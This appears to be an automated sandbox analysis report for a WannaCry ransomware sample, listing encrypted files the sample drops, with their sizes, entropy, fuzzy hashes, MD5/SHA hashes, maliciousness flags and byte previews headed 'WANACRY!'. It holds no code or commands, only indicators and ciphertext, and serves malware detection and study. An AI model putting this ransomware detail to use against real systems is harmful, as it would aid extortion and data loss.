                                                                                      Preview:WANACRY!....".hO..A.,C..rwL....Y;...s.. *.Pmf.....{g..CR.ZgWoc./.;......G.Y.5.V.gQ.p.f....C......P.#..|....<.?.O.8?6..c..mZ.!T...,..4s.y......4...:b..S........E;.b...]Y. >.,fz....d......d....R;......w..1R.~..>;......*MVV......)'.f...g..k|.9V3...=^4..z......ZD........a`...@IA.P<.c...4.Z1..OW.u....t......pX.....W.i.......=Q.o......nMX. 8....p...._B.\e4{...H...h...Z.@t..A.'.\.jl+.%......J........+u.w......'.T.h.qV.....e.?.F....B{\7.6E.......*=.C)......N.w....ef.$.k..q.].....6...t..;A{.+..~.....[~*yGK..b.C:,q.....Z.!.....G..d;)Z..GjA....-M...a(....1j.k...,...,.q..Q....W.4l....a.[../,k..?d...9.....Zm.9CS..H...r........ P.....g..=.2t$.9.'.t.4..m.>@o/T..x.:.....)..U..<.$MB."..j..&.....z.uS.JE...-n.....>>p.N$.....P....r..1u..*...%..!.8...Hv.....B.....Z.m?[j.R*..[...O.p7F...^VJ.h...Sz.v.....?...Iy......W|.j..R.Ui./.2.SF...r.C....Q.].C.9.3..H.W.^c2 ./.D.K>....fMh9z..8.($+'+.o...z...r....5.ub...WQ.I..8.oI.Jn.mC2\.R...p.H....H.....Q?....*_..?....]K
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):776
                                                                                      Entropy (8bit):7.720233763433794
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkcTmk/wsVv50TJbG9sDOIUXWZ7EBYkebgwMT8aCxSvT+:bkBkrR5p9sSIUGh6Y9gwoOSvC
                                                                                      MD5:3D7AE6D08CC4142B18E888ADAF4AFDF7
                                                                                      SHA1:229A1F307078FDF10FBC7FF932101D33D720AB5A
                                                                                      SHA-256:91ECF4182FD99960A68603879D00F9743A420D6F11B848350A9C8EA2034917EE
                                                                                      SHA-512:8D6448027CA6115E84FC5DE9BA83ED9007D12A59E931CCEB035DC457125F26082B1E7EF47D7AE50D5F56731BC33D63434E0777D7EFA8D0981447E59B9792A554
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....j.......B...:Y..'.z...&."..I.EBVzi.i....Z........E)............!./.....J.A.......L...i....^....@....x.......S.79.'N.IQ..<.m.%..GKP..B.V...u...y49n.Xm..W....Q..Iy.p`g_.'.t.s...E...6.Sg..."G...L......Qx....k....k........n..j}w.x_..6B...A...c.. ..............y.b.5?.B.....+{.3^.)......A...w.].R.."..M.Y....6.99.):..R.<..Z.!......`e. ...*.`.9.....&)...M4T.\...zE.........&.S."V1....2...Zi.E..BhB.2i.....+..&{.w.=..;m.".......*.>F.7...%....Lw.>....o..PB.Y............. ....C-..%...L..ux....0......Z...'!.1^...W.c.UtX.+}.....p)......H..O$QN..O.X..J.6.;l......,.>Fc.8(=.R....0.+..=...t..s..yn/.}.J.o......vE..X.....r.x...n......P...a...............A.&.U>.^O.....c.c.......Kf`.#<........r..58.i...Y}.6...8..VP@.....<....D....S.:....!,g...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):776
                                                                                      Entropy (8bit):7.720233763433794
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkcTmk/wsVv50TJbG9sDOIUXWZ7EBYkebgwMT8aCxSvT+:bkBkrR5p9sSIUGh6Y9gwoOSvC
                                                                                      MD5:3D7AE6D08CC4142B18E888ADAF4AFDF7
                                                                                      SHA1:229A1F307078FDF10FBC7FF932101D33D720AB5A
                                                                                      SHA-256:91ECF4182FD99960A68603879D00F9743A420D6F11B848350A9C8EA2034917EE
                                                                                      SHA-512:8D6448027CA6115E84FC5DE9BA83ED9007D12A59E931CCEB035DC457125F26082B1E7EF47D7AE50D5F56731BC33D63434E0777D7EFA8D0981447E59B9792A554
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....j.......B...:Y..'.z...&."..I.EBVzi.i....Z........E)............!./.....J.A.......L...i....^....@....x.......S.79.'N.IQ..<.m.%..GKP..B.V...u...y49n.Xm..W....Q..Iy.p`g_.'.t.s...E...6.Sg..."G...L......Qx....k....k........n..j}w.x_..6B...A...c.. ..............y.b.5?.B.....+{.3^.)......A...w.].R.."..M.Y....6.99.):..R.<..Z.!......`e. ...*.`.9.....&)...M4T.\...zE.........&.S."V1....2...Zi.E..BhB.2i.....+..&{.w.=..;m.".......*.>F.7...%....Lw.>....o..PB.Y............. ....C-..%...L..ux....0......Z...'!.1^...W.c.UtX.+}.....p)......H..O$QN..O.X..J.6.;l......,.>Fc.8(=.R....0.+..=...t..s..yn/.}.J.o......vE..X.....r.x...n......P...a...............A.&.U>.^O.....c.c.......Kf`.#<........r..58.i...Y}.6...8..VP@.....<....D....S.:....!,g...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1810872
                                                                                      Entropy (8bit):7.999876805780477
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:TGi6eMGw+9E4hXJPFKYRFELIQie7a7UwuO:TpPMGwcbVBYCe7ul
                                                                                      MD5:3F912DFB91B17DE27B589E126E75DBBF
                                                                                      SHA1:0C2E2C4864951DF4A9DDCB6CD1C5C7BD0D924150
                                                                                      SHA-256:27269B6A4C3D2A16210DB9099640C7A3AA0DDA93412E55B21DEF64EE6C545465
                                                                                      SHA-512:93B357A4ADD9ADDEB2531116D589E2A587ADE5E862F28925500EABC1120A7012B72B75D14B063006F3EC62B96C00DFE1CC8E66D8CA22D4CB43C01FAE6034D5EF
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....!..`.<.\..d.......t.k.D..i......p.'D1..i.MH...}.`........m.;z6y..t..._.J.,.P0.p.O..nT...07.B.hR./E......2K.x..D~>.J...v.?..|.3.w...}T.p.*c&.l.-.8...4q..oL.h...)~r$=_.Y.?.Mt..n.l.q..Z.E(....O..-..3...N.Uo.....Y.s...p.^.....{...{..5.....F..s...hG..~K..............:.......v.I....!...zq. .-+)R..x.X#.a...J.....tKZY{......'X..f.fZ.P._.{....E.z4W....N...e...-..oK51.....u..n.a.....W....n........g2.l.p.d..."CS&r.....H.g.I.%.6k.'.U. ..#..8...+...V....;.a<..l.9......u.....%...r....p7........I...Gh...I...u..&3h........!$.a.._.e)<.rn..u...G..C..E..Q).ZL(..{n...4-G..{H...~..zwD...=G.I..X....~#.....e.6....<.q7.<.{3 n.....iGC...l...l.....,...T...g8I....*,|?A..{UAg5.w...>#<|...H..Ox......,.]EQ.i>...9.QLZyP'.g......@.>.....k.]#...I..u.$G..)y..O....IJ~.D.=.....Crvm~}orM.5........H.9.......d.......K..t...!...%.38A`^.3o...Z.......ft..T...$.U.'...ZyH.N.N..e....$../.Pq...2./6a......A.M....cK.9OYV.G.T.!O.*..j..k%...f.P.;...s..;.q.B...._I..d.s*e.}.tR....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1810872
                                                                                      Entropy (8bit):7.999876805780477
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:TGi6eMGw+9E4hXJPFKYRFELIQie7a7UwuO:TpPMGwcbVBYCe7ul
                                                                                      MD5:3F912DFB91B17DE27B589E126E75DBBF
                                                                                      SHA1:0C2E2C4864951DF4A9DDCB6CD1C5C7BD0D924150
                                                                                      SHA-256:27269B6A4C3D2A16210DB9099640C7A3AA0DDA93412E55B21DEF64EE6C545465
                                                                                      SHA-512:93B357A4ADD9ADDEB2531116D589E2A587ADE5E862F28925500EABC1120A7012B72B75D14B063006F3EC62B96C00DFE1CC8E66D8CA22D4CB43C01FAE6034D5EF
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....!..`.<.\..d.......t.k.D..i......p.'D1..i.MH...}.`........m.;z6y..t..._.J.,.P0.p.O..nT...07.B.hR./E......2K.x..D~>.J...v.?..|.3.w...}T.p.*c&.l.-.8...4q..oL.h...)~r$=_.Y.?.Mt..n.l.q..Z.E(....O..-..3...N.Uo.....Y.s...p.^.....{...{..5.....F..s...hG..~K..............:.......v.I....!...zq. .-+)R..x.X#.a...J.....tKZY{......'X..f.fZ.P._.{....E.z4W....N...e...-..oK51.....u..n.a.....W....n........g2.l.p.d..."CS&r.....H.g.I.%.6k.'.U. ..#..8...+...V....;.a<..l.9......u.....%...r....p7........I...Gh...I...u..&3h........!$.a.._.e)<.rn..u...G..C..E..Q).ZL(..{n...4-G..{H...~..zwD...=G.I..X....~#.....e.6....<.q7.<.{3 n.....iGC...l...l.....,...T...g8I....*,|?A..{UAg5.w...>#<|...H..Ox......,.]EQ.i>...9.QLZyP'.g......@.>.....k.]#...I..u.$G..)y..O....IJ~.D.=.....Crvm~}orM.5........H.9.......d.......K..t...!...%.38A`^.3o...Z.......ft..T...$.U.'...ZyH.N.N..e....$../.Pq...2./6a......A.M....cK.9OYV.G.T.!O.*..j..k%...f.P.;...s..;.q.B...._I..d.s*e.}.tR....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):89784
                                                                                      Entropy (8bit):7.998045887374692
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:5bmerTOcaFkQM2xlLaxHF7bAK40jjllgvByGII69IOvU/TTSNUQo8Xiuy9XM3W:5bZVQvdafPAh0vllCcGIIGFsr8X3YM3W
                                                                                      MD5:E73F8EA32C7F6C63CD6B9A5159DC4887
                                                                                      SHA1:72BEAA5D471F5CD87646A67889A973F6BA184B61
                                                                                      SHA-256:94A289E196688B98E369A6158072BE9034707ADCD3EC53A1DBBC235D640CC2FF
                                                                                      SHA-512:DF83C0B0E58C8ABE56F7BCBD72B46E783E42CCC98ED3F1899212A965CAF03E807ED57C4A9E475BACC865A880AF5D4DFA245DA8AF5947A7A7685985E338D1477A
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....0.g<...e./.%&.......g6.g..0.#......6..u~;x3!...^.../]...U,YOE.....-$.l......3.Q$....'vSa.6...A.J\.Br..8..0.6.y ..p.Z.7|.....>.Q....E.v.yO.....$...zz.X..k..(.]1..q%..T.f...c.2....M.7g.+i.r%.pZ`/..0w..9e.......Q.v.f.R0[F..'..i)......+...F;.K.(.....].......j.L.]wZ.D>b..7U..`..hT...#.Z..C.a..';..d...'..3...*.O..t.?.?..a.yW.}G.N...xP7il.!....<.s/..........k...._y.up..w....... ..v9...V(...oYKJN.W.....x|...l..Q..........z....A..6S...V.%~...At=.>...M...1w@>[.[1..#.s.-_N@aW<....K.jN.......2....M.#<.i.)...a...%\.....8Y...'......m...." ./%vX..n'...(d..xlQ....@x.TJ.....1..&3.Pm..zYK..).... .2OU1.M}fxik#.pv:sVF..^.\.....\....e.#HLG....t..<......b..N=..k..T.F.N.+.E.'..\...,...G.0.k.\..?.=.T..#...o;.;...M.....$..f..P...pu...RDZ.e..[...+.4.d.FY..[.F.8..v.b.J,.............a..2../Z...O}.LCQ).v..s.?..^^e.f..,..BU..........[.e..=iX....g.A......h/.d.".....6.O...*.c..t.I.."V./E..Yi.e?.....)f>B].....T*:......Du...!.....H.....A.K...h .(...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):89784
                                                                                      Entropy (8bit):7.998045887374692
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:5bmerTOcaFkQM2xlLaxHF7bAK40jjllgvByGII69IOvU/TTSNUQo8Xiuy9XM3W:5bZVQvdafPAh0vllCcGIIGFsr8X3YM3W
                                                                                      MD5:E73F8EA32C7F6C63CD6B9A5159DC4887
                                                                                      SHA1:72BEAA5D471F5CD87646A67889A973F6BA184B61
                                                                                      SHA-256:94A289E196688B98E369A6158072BE9034707ADCD3EC53A1DBBC235D640CC2FF
                                                                                      SHA-512:DF83C0B0E58C8ABE56F7BCBD72B46E783E42CCC98ED3F1899212A965CAF03E807ED57C4A9E475BACC865A880AF5D4DFA245DA8AF5947A7A7685985E338D1477A
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....0.g<...e./.%&.......g6.g..0.#......6..u~;x3!...^.../]...U,YOE.....-$.l......3.Q$....'vSa.6...A.J\.Br..8..0.6.y ..p.Z.7|.....>.Q....E.v.yO.....$...zz.X..k..(.]1..q%..T.f...c.2....M.7g.+i.r%.pZ`/..0w..9e.......Q.v.f.R0[F..'..i)......+...F;.K.(.....].......j.L.]wZ.D>b..7U..`..hT...#.Z..C.a..';..d...'..3...*.O..t.?.?..a.yW.}G.N...xP7il.!....<.s/..........k...._y.up..w....... ..v9...V(...oYKJN.W.....x|...l..Q..........z....A..6S...V.%~...At=.>...M...1w@>[.[1..#.s.-_N@aW<....K.jN.......2....M.#<.i.)...a...%\.....8Y...'......m...." ./%vX..n'...(d..xlQ....@x.TJ.....1..&3.Pm..zYK..).... .2OU1.M}fxik#.pv:sVF..^.\.....\....e.#HLG....t..<......b..N=..k..T.F.N.+.E.'..\...,...G.0.k.\..?.=.T..#...o;.;...M.....$..f..P...pu...RDZ.e..[...+.4.d.FY..[.F.8..v.b.J,.............a..2../Z...O}.LCQ).v..s.?..^^e.f..,..BU..........[.e..=iX....g.A......h/.d.".....6.O...*.c..t.I.."V./E..Yi.e?.....)f>B].....T*:......Du...!.....H.....A.K...h .(...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):467448
                                                                                      Entropy (8bit):7.999534761038012
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:Ml6g/G4V9mtb0yl4sLHwlKeCcFo0H5otXy2wfuNItf:Mwg/GUQx4sElKeXo092vNG
                                                                                      MD5:F01E9CC0F416DC3B695BFFA92071AAEB
                                                                                      SHA1:2AC88FCC98C92EF3EF9952008AC7C46E4BE59946
                                                                                      SHA-256:0A6C645FE5A1CDDECEDF79AF1B13388679A47A7B888A5FFC3CBEAA0E3B008F20
                                                                                      SHA-512:B2F4A4203524D571370A0945818ECB3F2FC9CDBDC125D09B878832A0B3D3AC6B6B34D42E96FAA7030120B1B22CFF318299A04047FEC9A9ACEEFB4DD43AA5680B
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....z...+.....8*.}..3z?..{G.~.(p.^.#....4......7.S...:...i.Hc.U....}..T.dJ..}]..&..e.V>.....1.@$Q..c..m.3..4.^oM.b.2.rV..Y..n(~Tn...I#`}.."...^...J.|.2.X-..O..i[.._J..9e.....S.H....g...q..D.8.O./i.)....V.-Bt..m .Wi.~q......H...P0G.Vt3.M.._.-...k.e*...... .......p~.....!.......J.(o...a..=q.!.c.s.R.S..........tAo....Vn..>6..%...a....G..W.'.6...h.2..[.;....;..$..k;.3...N.c....i.+.O.li.f...d$P^.s.@c.K.}E.("p...D..@.M.r,Fw..}.S.1...f8e.......(\.N..o..O.8..w..'....OG...k...M(.!.`i.J..Kh..LjS)x`LP.P[F.x....U6..G..&...RUF..0.[...G..Pp.M.(...2..p..{.!B.&..Xo.J.B.0....)..;......P)?..W......A.)........s.\]E...q..k.=3.~.u...8.%T..pke@...w.A?8...`I9....tr...]..'8Jv.G.+..f..X.Q?......\............H..r.....]....M..N....o..3y.U.7..........z.M.).?.K1......v.g...b.s...y....s.9yX:.........n3..*...8..8.t...].R...U.j;..%....1..3.8...i..%"m.V.Gh.R......L..4.r-Q.h........@.uelN..xp...}.H.m>.F.Tb.b.kRC6.G..k..1....d|=...O.....k.S...1.Q.:.=.........._.uRSR..5
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):467448
                                                                                      Entropy (8bit):7.999534761038012
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:Ml6g/G4V9mtb0yl4sLHwlKeCcFo0H5otXy2wfuNItf:Mwg/GUQx4sElKeXo092vNG
                                                                                      MD5:F01E9CC0F416DC3B695BFFA92071AAEB
                                                                                      SHA1:2AC88FCC98C92EF3EF9952008AC7C46E4BE59946
                                                                                      SHA-256:0A6C645FE5A1CDDECEDF79AF1B13388679A47A7B888A5FFC3CBEAA0E3B008F20
                                                                                      SHA-512:B2F4A4203524D571370A0945818ECB3F2FC9CDBDC125D09B878832A0B3D3AC6B6B34D42E96FAA7030120B1B22CFF318299A04047FEC9A9ACEEFB4DD43AA5680B
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....z...+.....8*.}..3z?..{G.~.(p.^.#....4......7.S...:...i.Hc.U....}..T.dJ..}]..&..e.V>.....1.@$Q..c..m.3..4.^oM.b.2.rV..Y..n(~Tn...I#`}.."...^...J.|.2.X-..O..i[.._J..9e.....S.H....g...q..D.8.O./i.)....V.-Bt..m .Wi.~q......H...P0G.Vt3.M.._.-...k.e*...... .......p~.....!.......J.(o...a..=q.!.c.s.R.S..........tAo....Vn..>6..%...a....G..W.'.6...h.2..[.;....;..$..k;.3...N.c....i.+.O.li.f...d$P^.s.@c.K.}E.("p...D..@.M.r,Fw..}.S.1...f8e.......(\.N..o..O.8..w..'....OG...k...M(.!.`i.J..Kh..LjS)x`LP.P[F.x....U6..G..&...RUF..0.[...G..Pp.M.(...2..p..{.!B.&..Xo.J.B.0....)..;......P)?..W......A.)........s.\]E...q..k.=3.~.u...8.%T..pke@...w.A?8...`I9....tr...]..'8Jv.G.+..f..X.Q?......\............H..r.....]....M..N....o..3y.U.7..........z.M.).?.K1......v.g...b.s...y....s.9yX:.........n3..*...8..8.t...].R...U.j;..%....1..3.8...i..%"m.V.Gh.R......L..4.r-Q.h........@.uelN..xp...}.H.m>.F.Tb.b.kRC6.G..k..1....d|=...O.....k.S...1.Q.:.=.........._.uRSR..5
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16056
                                                                                      Entropy (8bit):7.989004111264376
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lQRD3SdrnPKPAiGZ2/Lpa+kCSkHyHuGSyab9WvMf5YYN/Np:liDiduPx1NgC9Y9Syi9WvM2Yrp
                                                                                      MD5:01890D54F273A02DA43CA946B5937D79
                                                                                      SHA1:D5567381FFD03D315B255AE7A45B12FB8BCE53A3
                                                                                      SHA-256:4DDE49E88D3CED268D61E26CC4AB655BB4D103DA5828EC6192D05BC4BEA7D8C5
                                                                                      SHA-512:DF7F30A38407ADDF8F09EBBE163D95137799B30396F89CDC6805F4528C70ECAEEDEDABD09FCACE10A71F8BD487A253E388968FA47034E84B4191B0EFD724EBA5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......+..?c.'.7 5....88?R..Dw.g.g[.n$c.......C...-.[.;.f.o..[..S..~Q..P..c8*!..|.....5.{Q..+.z..94...{C_.Taf..f._-BG..j.1...TFc.....B.k([...,....}.&.Bro<y...W..~...Qs...p.R.\D...Q..F.m?.^.`.r.>.E.e"...~l%..mV.5Z...U...c._..k....~!E.....mo..;..r.....=..........>]T.....5.....s..T,.thS...A..H........E,.(.Sf..{.....p.....ytF.w&...m...."hI..@+.6.TC..e_.....3../.....Odp.?...+_..G...Je..C.$..C.V.G..P.6....NQ...3Ny.....h..`\.....#...O)@....".5....K+!4D..J.`z..n..Z.....Kt...?`m..*.WCD.."...Z..v.K"F.O.y.%.w...^..d.|.OP^%0.Oe.7(.1|sM8m.....}....E.......<.... |....3........|xV^..Q........h.IF...=PC...l..q.RI..;p.D......~..Yi...:....Qp.*....mB o.c.....u.Sv..pFl.....WI..1...XQ..=J*.'z7O.2tFp.)`........'^........ ?<...Y.X.D5QZ.l.)0....V.....F.F..{]..P..Tb._.@...q(.iks..(....1...QY.Z".:!.....z...a.q..Ew..#c..........lx...A}.R.H......8N.y.6.k:.hf.9sDj..=...;.W.#FS#....[R...rv,.:.Z.B)..o..;'.x....\[>a... .:.....Q..L.i.pN...z.5...nF...|<\X....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16056
                                                                                      Entropy (8bit):7.989004111264376
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lQRD3SdrnPKPAiGZ2/Lpa+kCSkHyHuGSyab9WvMf5YYN/Np:liDiduPx1NgC9Y9Syi9WvM2Yrp
                                                                                      MD5:01890D54F273A02DA43CA946B5937D79
                                                                                      SHA1:D5567381FFD03D315B255AE7A45B12FB8BCE53A3
                                                                                      SHA-256:4DDE49E88D3CED268D61E26CC4AB655BB4D103DA5828EC6192D05BC4BEA7D8C5
                                                                                      SHA-512:DF7F30A38407ADDF8F09EBBE163D95137799B30396F89CDC6805F4528C70ECAEEDEDABD09FCACE10A71F8BD487A253E388968FA47034E84B4191B0EFD724EBA5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......+..?c.'.7 5....88?R..Dw.g.g[.n$c.......C...-.[.;.f.o..[..S..~Q..P..c8*!..|.....5.{Q..+.z..94...{C_.Taf..f._-BG..j.1...TFc.....B.k([...,....}.&.Bro<y...W..~...Qs...p.R.\D...Q..F.m?.^.`.r.>.E.e"...~l%..mV.5Z...U...c._..k....~!E.....mo..;..r.....=..........>]T.....5.....s..T,.thS...A..H........E,.(.Sf..{.....p.....ytF.w&...m...."hI..@+.6.TC..e_.....3../.....Odp.?...+_..G...Je..C.$..C.V.G..P.6....NQ...3Ny.....h..`\.....#...O)@....".5....K+!4D..J.`z..n..Z.....Kt...?`m..*.WCD.."...Z..v.K"F.O.y.%.w...^..d.|.OP^%0.Oe.7(.1|sM8m.....}....E.......<.... |....3........|xV^..Q........h.IF...=PC...l..q.RI..;p.D......~..Yi...:....Qp.*....mB o.c.....u.Sv..pFl.....WI..1...XQ..=J*.'z7O.2tFp.)`........'^........ ?<...Y.X.D5QZ.l.)0....V.....F.F..{]..P..Tb._.@...q(.iks..(....1...QY.Z".:!.....z...a.q..Ew..#c..........lx...A}.R.H......8N.y.6.k:.hf.9sDj..=...;.W.#FS#....[R...rv,.:.Z.B)..o..;'.x....\[>a... .:.....Q..L.i.pN...z.5...nF...|<\X....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):258856
                                                                                      Entropy (8bit):7.999230405435389
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:zAf2CRsncp+CQjhhUbRu9vK2fa62nq5DpSH2b78tMkV6xQ:zAF4tw2fEnIEW38tMO6xQ
                                                                                      MD5:0282FB6D6FCCA86281DC9B651A3BA229
                                                                                      SHA1:FD1B676F23BACBCB3C0C63BA5F1D57278D3CD2AA
                                                                                      SHA-256:5B2391A4745B3C7FC005E350A60175FF944327C50FDB61523BAC6AFC9E507315
                                                                                      SHA-512:E7A3F20C29918775440481678F5EC042BAD500812CDE98D862F3AB0B4D077BF09112FE52ECE81645A7D53D097240F643ADC26FBE0C35336C1AD8235E0B52D229
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....L.<."...N.........O-mwt.o..C.G8[]...2......s.M..].......Ze.a...p...8....w.D-.m.C-P..B.X...@.N.\.@..F.{....-.Trib.O.)...?..1}...Vs^Xy. ...m..Zq.U....z...A..sF.sc......]......*..`...7&mJxI.k....KLpc.%.....Vnw.^Deh.....^..##...9.$..5'.^*.56.4Lc.]3O...............u...M.{.0....Fac.[o...T2.`.[...D.X....,T.[*...S._g.D.P.7......4....8.l.PP...oj...?..Xmo..x;+.^..=...E.?.Gl..iP'......<... tm.<X>..-.u8p.c`.Ad..H...Q......,.....[."&.#.o9b..).**..0.V...e[.../O..p.q.6#.tE...L.kL......+_.n.3~v....f.~.....;..MfS@..-.4.....j.........@...@.R..jN}W.l..&...5........{.e`....F...-;.Y&.J.z1........R.I+v.DH.p!.A.h.s.P.vx..L6...f.\K...&..jhW........#.?.).....$...b. Hg.6=.....$.du..0.:....y.b...o.M..|w..=.U.Y."ue..J....}B.t...V.m..}....M.....j.!...U.,3.s...!T.s..C~>..|B....9Q...C.'...._...(.........F.UG.Dd.......L.&.[.ST.]{.7M....!:[(.l..smQ.*.../.Et..S^q.Honam>.o.Y.T.......,...y..=a)...Vx...XI/'.....h.$V.w.. ......}.mS..K.,H"!...u..U..H5........T..I.&'K
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):258856
                                                                                      Entropy (8bit):7.999230405435389
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:zAf2CRsncp+CQjhhUbRu9vK2fa62nq5DpSH2b78tMkV6xQ:zAF4tw2fEnIEW38tMO6xQ
                                                                                      MD5:0282FB6D6FCCA86281DC9B651A3BA229
                                                                                      SHA1:FD1B676F23BACBCB3C0C63BA5F1D57278D3CD2AA
                                                                                      SHA-256:5B2391A4745B3C7FC005E350A60175FF944327C50FDB61523BAC6AFC9E507315
                                                                                      SHA-512:E7A3F20C29918775440481678F5EC042BAD500812CDE98D862F3AB0B4D077BF09112FE52ECE81645A7D53D097240F643ADC26FBE0C35336C1AD8235E0B52D229
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....L.<."...N.........O-mwt.o..C.G8[]...2......s.M..].......Ze.a...p...8....w.D-.m.C-P..B.X...@.N.\.@..F.{....-.Trib.O.)...?..1}...Vs^Xy. ...m..Zq.U....z...A..sF.sc......]......*..`...7&mJxI.k....KLpc.%.....Vnw.^Deh.....^..##...9.$..5'.^*.56.4Lc.]3O...............u...M.{.0....Fac.[o...T2.`.[...D.X....,T.[*...S._g.D.P.7......4....8.l.PP...oj...?..Xmo..x;+.^..=...E.?.Gl..iP'......<... tm.<X>..-.u8p.c`.Ad..H...Q......,.....[."&.#.o9b..).**..0.V...e[.../O..p.q.6#.tE...L.kL......+_.n.3~v....f.~.....;..MfS@..-.4.....j.........@...@.R..jN}W.l..&...5........{.e`....F...-;.Y&.J.z1........R.I+v.DH.p!.A.h.s.P.vx..L6...f.\K...&..jhW........#.?.).....$...b. Hg.6=.....$.du..0.:....y.b...o.M..|w..=.U.Y."ue..J....}B.t...V.m..}....M.....j.!...U.,3.s...!T.s..C~>..|B....9Q...C.'...._...(.........F.UG.Dd.......L.&.[.ST.]{.7M....!:[(.l..smQ.*.../.Et..S^q.Honam>.o.Y.T.......,...y..=a)...Vx...XI/'.....h.$V.w.. ......}.mS..K.,H"!...u..U..H5........T..I.&'K
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):105400
                                                                                      Entropy (8bit):7.997984243947538
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:x5zuq8GiNBAMHDX5SF7RqEjdvDm1RvfLBwVj2FUKXuRUsZCF9JcbJ6VSxc:x5yqeNGMQRqEJvwLB2quKXuDCTQJPc
                                                                                      MD5:55ECFC0796245D01827A26F470D14C7A
                                                                                      SHA1:FBBE8545D5494953CFE85916218F80A324F358E2
                                                                                      SHA-256:B453B36C67F31ECC9C8534ED1001A9EA6142D070116788363EF19A2A1B8ACADF
                                                                                      SHA-512:DF656DEBBDDC96392052A5DA0DF6125106121FA50F21EE9D73C32D2D8F21D37A1735788EFEF2DD1ADF85063325FC7B9DC1B13B10F278DDF89FC99C3BB1F8E089
                                                                                      Malicious:true
                                                                                      Reputation:low
